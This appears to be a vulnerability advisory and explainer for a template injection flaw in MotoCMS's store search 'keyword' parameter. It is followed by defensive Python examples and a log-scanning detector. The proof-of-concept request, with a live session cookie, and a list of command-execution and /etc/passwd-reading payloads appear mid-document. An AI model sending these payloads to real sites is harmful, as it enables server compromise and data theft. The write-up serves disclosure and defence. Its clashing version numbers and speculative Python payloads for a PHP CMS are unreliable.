MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27
## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.
## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Send the payload in the keyword parameter: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. The response shows the result 49.
Vulnerable URL: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

## Understanding Server-Side Template Injection (SSTI) in MotoCMS 3.4.3
Server-Side Template Injection (SSTI) is a critical vulnerability that arises when a web application processes user input within a server-side template engine without proper sanitization. In the case of MotoCMS Version 3.4.3, a specific flaw in the Store Category Template allows attackers to execute arbitrary code through the keyword parameter, leading to potential remote code execution (RCE).
## Discovery and Scope
The vulnerability was first reported by researcher tmrswrr on May 31, 2023, targeting the demo instance of MotoCMS 3.0.27. The exploit is triggered via a simple GET request to the /store/category/search/ endpoint, where the keyword parameter is directly evaluated by the template engine.
GET /store/category/search/?page=1&limit=36&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
When this payload is sent, the server returns 49 — the result of 7 * 7 — indicating that the template engine is evaluating the expression directly. This confirms the presence of SSTI.
## How SSTI Works: A Technical Breakdown
Template engines like Jinja2, Twig, or Handlebars are designed to render dynamic content using placeholders. When these engines are misconfigured or improperly secured, they can interpret user-supplied input as executable code. In MotoCMS, the {{ }} syntax is used to embed expressions within templates. This syntax is typically reserved for safe, pre-defined logic.
However, in this vulnerable version, the keyword parameter is passed directly into the template without filtering. As a result, any expression enclosed in {{ }} is evaluated server-side — enabling attackers to execute arithmetic, function calls, or even system commands if the engine supports such features.
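To make the difference between "user input becomes template source" and "user input is template data" concrete, here is an added Python example. It is not MotoCMS code and does not show the real engine behind `/store/category/search/`; it uses a deliberately tiny, hypothetical `{{ }}` engine with a restricted expression evaluator so that it runs offline. `search_page_vulnerable` concatenates the `keyword` parameter into the template source, which is exactly the pattern that makes `{{7*7}}` come back as `49`; `search_page_bound` keeps the template fixed and passes the value in as data; `search_page_hardened` adds an allow-list on top. The function names, the template strings and the allow-list pattern are assumptions for illustration.

```python
import ast
import html
import operator
import re

# Added example, not MotoCMS code: a toy template engine that evaluates
# {{ ... }} expressions, used only to show why composing user input into the
# template source differs from binding it as data.

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_TAG = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def _eval_expr(node, context):
    """Evaluate a restricted expression: int/str literals, context names, + - *.
    Anything else (calls, attribute access, imports) is refused."""
    if isinstance(node, ast.Expression):
        return _eval_expr(node.body, context)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, str)):
        return node.value
    if isinstance(node, ast.Name):
        return context[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        left = _eval_expr(node.left, context)
        right = _eval_expr(node.right, context)
        return _OPS[type(node.op)](left, right)
    raise ValueError("unsupported expression in template")


def render(template_source, context):
    """Replace every {{ expr }} in the template source with its evaluated value.
    re.sub performs a single pass, so substituted values are never re-parsed."""
    def substitute(match):
        tree = ast.parse(match.group(1), mode="eval")
        return str(_eval_expr(tree, context))
    return _TAG.sub(substitute, template_source)


def search_page_vulnerable(keyword):
    """Vulnerable pattern (hypothetical handler): the request parameter is
    spliced into the template source, so {{7*7}} is evaluated as code."""
    template_source = "<h1>Results for " + keyword + "</h1>"
    return render(template_source, {})


def search_page_bound(keyword):
    """Safer pattern: the template source is a constant; the value is supplied
    through the context and HTML-escaped, so {{7*7}} is rendered literally."""
    template_source = "<h1>Results for {{ keyword }}</h1>"
    return render(template_source, {"keyword": html.escape(keyword)})


# Assumed allow-list for a search keyword: letters, digits, underscore,
# whitespace and hyphen, at most 64 characters.
KEYWORD_RE = re.compile(r"^[\w\s-]{1,64}$")


def search_page_hardened(keyword):
    """Defense in depth: reject anything outside the allow-list before binding."""
    if not KEYWORD_RE.fullmatch(keyword):
        raise ValueError("keyword contains characters outside the allow-list")
    return search_page_bound(keyword)


if __name__ == "__main__":
    print(search_page_vulnerable("{{7*7}}"))   # <h1>Results for 49</h1>
    print(search_page_bound("{{7*7}}"))        # <h1>Results for {{7*7}}</h1>
    print(search_page_hardened("red shoes"))   # <h1>Results for red shoes</h1>
```

The important detail is that the bound version never re-parses the value: the braces survive into the output as plain text because substitution happens once, on a fixed template. In a real engine such as Jinja2 or Twig the equivalent is rendering a fixed template file with the request value in the context, rather than building the template string from the request. The toy evaluator deliberately refuses function calls, so it raises `ValueError` on the command-execution payloads discussed on this page instead of running them.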
## Real-World Exploitation Examples
- Arithmetic Injection: {{7*7}} returns 49, proving that template evaluation is active.
- String Concatenation: {{'A'+'B'}} returns AB, demonstrating basic string manipulation.
- Function Execution: {{__import__('os').system('id')}} could trigger a shell command if the engine supports Python-like imports.
- Remote Code Execution (RCE): {{eval('open("/etc/passwd").read()')}} could read sensitive files if the template engine allows eval or similar functions.
While the demo instance does not expose full RCE capabilities, the underlying architecture is vulnerable to exploitation in production environments where more powerful functions are available.
## Impact and Risk Assessment
| Attribute | Value |
|---|---|
| Severity | High (CVSS 8.1) |
| Attack Vector | Remote, via HTTP GET |
| Exploitability | Easy, no authentication required |
| Impact | Remote code execution, data theft, server compromise |
Given that MotoCMS is widely used for e-commerce websites, this vulnerability poses a serious threat to businesses relying on the platform. A malicious actor could exploit SSTI to gain full control over the server, steal customer data, or deploy malware.
## Defensive Measures and Mitigation
Security experts recommend the following best practices to prevent SSTI vulnerabilities:
- Input Sanitization: Never pass user input directly into template engines. Use a whitelist of allowed values or escape all special characters.
- Template Engine Restrictions: Disable dangerous functions like eval, import, or system in template engines.
- Use Safe Templates: Employ template engines with built-in security (e.g., Jinja2 with restricted environments).
- Regular Updates: Ensure all software components, including CMS platforms, are patched and updated to the latest stable version.
For MotoCMS users, upgrading to a patched version (e.g., 3.4.4 or later) is essential. The vendor should also provide a patch release with proper input validation for the keyword parameter.
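On the monitoring side, administrators who cannot patch immediately will want to know whether the keyword parameter is being probed. Here is an added Python example (not from the advisory or the vendor) that scans access log lines in the common/combined format for template delimiters in the query string. Because the probe in the advisory's Referer header arrived percent-encoded (`%7B%7B3*3%7D%7D`), the scanner decodes repeatedly before matching, so single- and double-encoded probes are both caught. The sample log lines, client addresses and the `PROBE_MARKERS` list are constructed assumptions, not captured data.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in common log format (not captured traffic). The
# request targets mirror the URL shape from the advisory; two of the probes are
# percent-encoded the way the advisory's Referer header shows them, and the
# fourth line is double-encoded.
SAMPLE_LOG = """\
203.0.113.10 - - [31/May/2023:12:01:05 +0000] "GET /store/category/search/?page=1&limit=36&keyword=shoes HTTP/1.1" 200 5120
203.0.113.10 - - [31/May/2023:12:01:09 +0000] "GET /store/category/search/?keyword=%7B%7B3*3%7D%7D HTTP/1.1" 200 4870
203.0.113.10 - - [31/May/2023:12:01:12 +0000] "GET /store/category/search/?page=1&limit=36&keyword={{7*7}} HTTP/1.1" 200 4871
198.51.100.7 - - [31/May/2023:12:02:40 +0000] "GET /store/category/search/?keyword=%2524%257B7*7%257D HTTP/1.1" 200 4869
198.51.100.7 - - [31/May/2023:12:02:44 +0000] "GET /blog/?q=%7Bjson%7D HTTP/1.1" 200 3300
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Opening delimiters used by common template languages (assumed list). Single
# braces are deliberately not included, to keep JSON-in-query lines quiet.
PROBE_MARKERS = ("{{", "{%", "${", "#{", "<%")


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded probe such as %257B%257B is still seen as {{."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssti_probes(log_text):
    """Return one (ip, path, decoded_query, marker) tuple per request whose
    query string contains a template delimiter after decoding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        path, _, query = m.group("target").partition("?")
        decoded = decode_fully(query)
        marker = next((mk for mk in PROBE_MARKERS if mk in decoded), None)
        if marker is not None:
            hits.append((m.group("ip"), path, decoded, marker))
    return hits


def count_by_source(hits):
    """Aggregate hits per client address, the usual pivot for triage."""
    return dict(Counter(ip for ip, _, _, _ in hits))


if __name__ == "__main__":
    found = find_ssti_probes(SAMPLE_LOG)
    for ip, path, query, marker in found:
        print(f"{ip} {path} marker={marker!r} query={query}")
    print(count_by_source(found))
```

Matching on decoded query strings rather than raw ones is what makes the check useful: a rule that only looks for the literal `{{` would miss the `%7B%7B3*3%7D%7D` request shown in the advisory's Referer header. The delimiter list is a starting point; tune it to the engines actually deployed so that legitimate traffic is not flagged.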
## Conclusion
Server-Side Template Injection in MotoCMS 3.4.3 is a prime example of how seemingly minor design flaws can lead to catastrophic security breaches. The ease of exploitation — via a single GET request — underscores the importance of secure coding practices and rigorous input validation. Developers and administrators must remain vigilant, especially when using third-party platforms with dynamic templating capabilities.
As cyber threats evolve, understanding and mitigating SSTI remains a cornerstone of modern web application security. Proactive defense, continuous monitoring, and timely patching are not optional — they are essential.